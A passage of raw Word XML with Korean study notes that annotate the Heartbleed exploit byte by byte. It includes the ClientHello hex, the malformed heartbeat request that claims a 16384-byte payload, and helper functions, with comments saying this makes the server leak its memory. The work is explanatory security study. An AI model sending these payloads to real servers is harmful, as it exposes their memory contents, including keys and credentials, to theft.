                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">x값을 받아서 공백과 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>줄바꿈을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 없앤 뒤 문자열을 </w:t>
            </w:r>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">hex </w:t>
            </w:r>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">값으로 </w:t>
            </w:r>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">encoding </w:t>
            </w:r>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A874C4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def h2bin(x):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7994375A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return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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x.replace</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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' ', '').replace('\n', '').decode('hex')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461C61B8" w14:textId="6EBA7BCC" w:rsid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</w:p>
          <w:p w14:paraId="1CF2A220" w14:textId="2C413F08" w:rsidR="00427053" w:rsidRDefault="00427053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</w:pP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#</w:t>
            </w:r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먼저,</w:t>
            </w:r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SSL </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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handshke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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를 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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가르켰을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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때 프로토콜 버전과 길이를 정한다는 의미</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A3C0D2" w14:textId="0A85F3C4" w:rsidR="00427053" w:rsidRDefault="00427053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# </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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16 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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handshake , 03 02 : TLS version 1.1 , 00 dc : Length</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="104B0971" w14:textId="321C6E3C" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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01 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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handshake, 00 00 d8 : TLS version 1.1 , 03 02 : Length</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="372D6908" w14:textId="4693691C" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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53 43 5b </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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90 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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timestamp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20342865" w14:textId="67319C87" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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9d ~ </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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de :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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random bytes. </w:t>
            </w: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유닉스 t</w:t>
            </w:r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imestamp</w:t>
            </w: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와 무작위로 생성된 </w:t>
            </w:r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28</w:t>
            </w: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바이트 길이의 값이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="169B948C" w14:textId="77777777" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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00 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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세션 식별자의 길이 정보.</w:t>
            </w:r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보통 브라우저가 최근 서버에 방문,</w:t>
            </w:r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이전 세션을 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754EC586" w14:textId="1B94DBF2" w:rsidR="00427053" w:rsidRDefault="00427053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# </w:t>
            </w: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이어 가기 위해 </w:t>
            </w:r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Abbreviated Handshake</w:t>
            </w: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를 할 때 사용한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C6924E" w14:textId="07EF470F" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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00 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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66 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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암호화 </w:t>
            </w:r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suites</w:t>
            </w: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의 길이</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0185CFB0" w14:textId="1CB81BAF" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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c0 ~ </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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ff :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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클라이언트에서 지원하는 암호 방식의 리스트 메시지에 대한 길이와 메시지</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E0AC304" w14:textId="523E7626" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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01 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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압축 방법에 대한 필드의 길이와 방법에 대한 정보</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="405CCC06" w14:textId="41478212" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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00 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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압축을 하지 않았기 때문에 </w:t>
            </w:r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00</w:t>
            </w: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이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F55C673" w14:textId="2EF24787" w:rsidR="00427053" w:rsidRDefault="00427053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#</w:t>
            </w:r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00 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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49 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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</w:t>
            </w:r>
            <w:r w:rsidR="00CC3E4A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T</w:t>
            </w:r>
            <w:r w:rsidR="00CC3E4A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LS </w:t>
            </w:r>
            <w:r w:rsidR="00CC3E4A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추가 확장에 대한 길이에 대한 정의 </w:t>
            </w:r>
            <w:r w:rsidR="00CC3E4A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(</w:t>
            </w:r>
            <w:r w:rsidR="00CC3E4A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다른 필드처럼 항상 길이부터 정의한다)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FAECFED" w14:textId="46A3AD43" w:rsidR="00CC3E4A" w:rsidRDefault="00CC3E4A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#</w:t>
            </w:r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00 0b ~ 00 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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11 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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E</w:t>
            </w:r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lliptic-curve </w:t>
            </w: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암호와 관련하여 정의</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103AB996" w14:textId="76FC95FF" w:rsidR="00CC3E4A" w:rsidRDefault="00CC3E4A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#</w:t>
            </w:r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00 23 00 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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00 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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TLS </w:t>
            </w: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세션 티켓 확장 모듈을 지원한다는 것을 알림</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5313445B" w14:textId="242F489C" w:rsidR="00CC3E4A" w:rsidRDefault="00CC3E4A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#</w:t>
            </w:r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00 0f 00 01 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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01 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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TLS Heartbeat </w:t>
            </w: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확장을 지원하는 것을 정의</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45013F98" w14:textId="392551C7" w:rsidR="00CC3E4A" w:rsidRPr="002346A6" w:rsidRDefault="00CC3E4A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</w:pP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#</w:t>
            </w:r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서버에게서 h</w:t>
            </w:r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ello done </w:t>
            </w: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응답 메시지를 받으면 </w:t>
            </w:r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heartbeat </w:t>
            </w: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요청 메시지를 작성하게 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DDAA95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hello = h2</w:t>
            </w:r>
            <w:proofErr w:type="gram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bin(</w:t>
            </w:r>
            <w:proofErr w:type="gram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'''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E5EEB1" w14:textId="4A73A748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16 03 02 </w:t>
            </w:r>
            <w:proofErr w:type="gram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00  dc</w:t>
            </w:r>
            <w:proofErr w:type="gram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01 00 00 d8 03 02 53</w:t>
            </w:r>
            <w:r w:rsidR="000E0C49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          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B02F0F7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43 5b 90 9d 9b 72 0b </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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bc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0</w:t>
            </w:r>
            <w:proofErr w:type="gram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c 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bc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2b 92 a8 48 97 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cf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2AE30674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bd 39 04 cc 16 0a 85 </w:t>
            </w:r>
            <w:proofErr w:type="gram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03  90</w:t>
            </w:r>
            <w:proofErr w:type="gram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9f 77 04 33 d4 de 00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627B57FF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00 66 c0 14 c0 0a c0 </w:t>
            </w:r>
            <w:proofErr w:type="gram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22  c</w:t>
            </w:r>
            <w:proofErr w:type="gram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0 21 00 39 00 38 00 88</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30EBB2E5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00 87 c0 0f c0 05 00 </w:t>
            </w:r>
            <w:proofErr w:type="gram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35  00</w:t>
            </w:r>
            <w:proofErr w:type="gram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84 c0 12 c0 08 c0 1c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D3ACC30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c0 1b 00 16 00 13 c0 0</w:t>
            </w:r>
            <w:proofErr w:type="gram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d  c</w:t>
            </w:r>
            <w:proofErr w:type="gram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0 03 00 0a c0 13 c0 09</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B834D7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lastRenderedPageBreak/>
              <w:t xml:space="preserve">c0 1f c0 1e 00 33 00 </w:t>
            </w:r>
            <w:proofErr w:type="gram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32  00</w:t>
            </w:r>
            <w:proofErr w:type="gram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9a 00 99 00 45 00 44</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CCFE90F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c0 0e c0 04 00 2f 00 </w:t>
            </w:r>
            <w:proofErr w:type="gram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96  00</w:t>
            </w:r>
            <w:proofErr w:type="gram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41 c0 11 c0 07 c0 0c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2CACD5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c0 02 00 05 00 04 00 </w:t>
            </w:r>
            <w:proofErr w:type="gram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15  00</w:t>
            </w:r>
            <w:proofErr w:type="gram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12 00 09 00 14 00 11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEF2CB0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00 08 00 06 00 03 00 </w:t>
            </w:r>
            <w:proofErr w:type="gram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ff  01</w:t>
            </w:r>
            <w:proofErr w:type="gram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00 00 49 00 0b 00 04</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55923673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03 00 01 02 00 0a 00 </w:t>
            </w:r>
            <w:proofErr w:type="gram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34  00</w:t>
            </w:r>
            <w:proofErr w:type="gram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32 00 0e 00 0d 00 19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653FC3CD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00 0b 00 0c 00 18 00 </w:t>
            </w:r>
            <w:proofErr w:type="gram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09  00</w:t>
            </w:r>
            <w:proofErr w:type="gram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0a 00 16 00 17 00 08</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A476A22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00 06 00 07 00 14 00 </w:t>
            </w:r>
            <w:proofErr w:type="gram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15  00</w:t>
            </w:r>
            <w:proofErr w:type="gram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04 00 05 00 12 00 13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BF9251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00 01 00 02 00 03 00 0</w:t>
            </w:r>
            <w:proofErr w:type="gram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f  00</w:t>
            </w:r>
            <w:proofErr w:type="gram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10 00 11 00 23 00 00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="505CD97C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00 0f 00 01 01                                  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15103C66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''')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3460FCE4" w14:textId="77777777" w:rsidR="00CC3E4A" w:rsidRDefault="00CC3E4A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</w:p>
          <w:p w14:paraId="2A4C7BD6" w14:textId="77777777" w:rsidR="00CC3E4A" w:rsidRDefault="00CC3E4A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#</w:t>
            </w:r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18 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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T</w:t>
            </w:r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LS </w:t>
            </w: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레코드가 H</w:t>
            </w:r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eartbeat </w:t>
            </w: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임을 명시</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1AFB58" w14:textId="77777777" w:rsidR="00CC3E4A" w:rsidRDefault="00CC3E4A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# 03 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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02 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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TLS </w:t>
            </w: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버전이 </w:t>
            </w:r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1.1</w:t>
            </w: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임을 명시</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3A19CB" w14:textId="77777777" w:rsidR="00CC3E4A" w:rsidRDefault="00CC3E4A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# 00 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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03 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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H</w:t>
            </w:r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eartbeat </w:t>
            </w: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메시지의 길이 명시</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5079DEA7" w14:textId="77777777" w:rsidR="00CC3E4A" w:rsidRDefault="00CC3E4A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# </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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01 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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Heartbeat </w:t>
            </w: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요청임을 명시</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A7BB048" w14:textId="71F4E87E" w:rsidR="00CC3E4A" w:rsidRPr="00466168" w:rsidRDefault="00CC3E4A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FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"># 40 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">페이로드길이를 </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16384 bytes</w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>로 명시</w:t>
            </w:r>
            <w:r w:rsidR="00466168" w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(16</w:t>
            </w:r>
            <w:r w:rsidR="00466168" w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">진수로 </w:t>
            </w:r>
            <w:r w:rsidR="00466168" w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4000). </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>이 부분이 공격의 핵심으로,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1712AA00" w14:textId="04673471" w:rsidR="00CC3E4A" w:rsidRPr="00466168" w:rsidRDefault="00CC3E4A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FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">길이를 </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16384 bytes</w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>로 명시했으나 실제로는 그 만큼의 메시지를 보내지 않는다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065382C9" w14:textId="05CDBCA5" w:rsidR="00CC3E4A" w:rsidRPr="002346A6" w:rsidRDefault="00CC3E4A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</w:pPr>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">이 값에 의해서 해당 </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">bytes </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>만큼 서버 메모리에 있는 정보를 응답으로 되돌려 받는다</w:t>
            </w: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.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="654BE040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hb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= h2</w:t>
            </w:r>
            <w:proofErr w:type="gram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bin(</w:t>
            </w:r>
            <w:proofErr w:type="gram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''' </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE6DC08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18 03 02 00 03</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7593DE25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01 </w:t>
            </w:r>
            <w:r w:rsidRPr="00466168">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>40 00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BE16F8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''')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B8406BA" w14:textId="2A2B6F20" w:rsid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</w:p>
          <w:p w14:paraId="5F52F803" w14:textId="0D8C01F8" w:rsidR="002346A6" w:rsidRPr="008A727E" w:rsidRDefault="002346A6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>
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r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2302F739" w14:textId="4F342CB5" w:rsid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def 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hexdump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s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA3FCA3" w14:textId="51EFE195" w:rsidR="002346A6" w:rsidRPr="002346A6" w:rsidRDefault="002346A6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 w:rsidRPr="002346A6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</w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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  # 0</w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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에서부터 시작하여</w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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[</w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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변수 </w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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s</w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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의 길이-</w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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1]</w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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값이 될 때까지 </w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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16</w:t>
            </w:r>
            <w:r w:rsidRPr="002346A6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을 더한 값의 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002346A6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범위 만큼</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002346A6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반복</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43D2FD87" w14:textId="7AADE858" w:rsid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for b in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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xrange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0, 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len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s), 16):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CB7624A" w14:textId="07C9E50E" w:rsidR="002346A6" w:rsidRPr="005C2758" w:rsidRDefault="002346A6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 w:rsidRPr="005C2758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</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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      # </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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s</w:t>
            </w:r>
            <w:r w:rsidR="005C2758" w:rsidRPr="005C2758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의 인덱스를 </w:t>
            </w:r>
            <w:r w:rsidR="005C2758" w:rsidRPr="005C2758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16</w:t>
            </w:r>
            <w:r w:rsidR="005C2758" w:rsidRPr="005C2758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씩 늘려가며 해당 값을 차례대로 </w:t>
            </w:r>
            <w:r w:rsidR="005C2758" w:rsidRPr="005C2758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c</w:t>
            </w:r>
            <w:r w:rsidR="005C2758" w:rsidRPr="005C2758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에 저장한 뒤 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005C2758" w:rsidRPr="005C2758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lin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005C2758" w:rsidRPr="005C2758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</w:t>
            </w:r>
            <w:r w:rsidR="005C2758" w:rsidRPr="005C2758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값에 저장</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10550A40" w14:textId="6764F23F" w:rsid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lin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= [c for c in </w:t>
            </w:r>
            <w:proofErr w:type="gram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s[</w:t>
            </w:r>
            <w:proofErr w:type="gram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b : b + 16]]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26AE4284" w14:textId="7E84BE9E" w:rsidR="005C2758" w:rsidRPr="005C2758" w:rsidRDefault="005C2758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 w:rsidRPr="005C2758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</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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      # </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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리스트 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2758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lin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2758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</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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값을 차례대로 아스키 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2758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코드값으로</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2758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변환한 뒤 </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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2</w:t>
            </w:r>
            <w:r w:rsidRPr="005C2758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자리수 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2758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헥사값으로</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
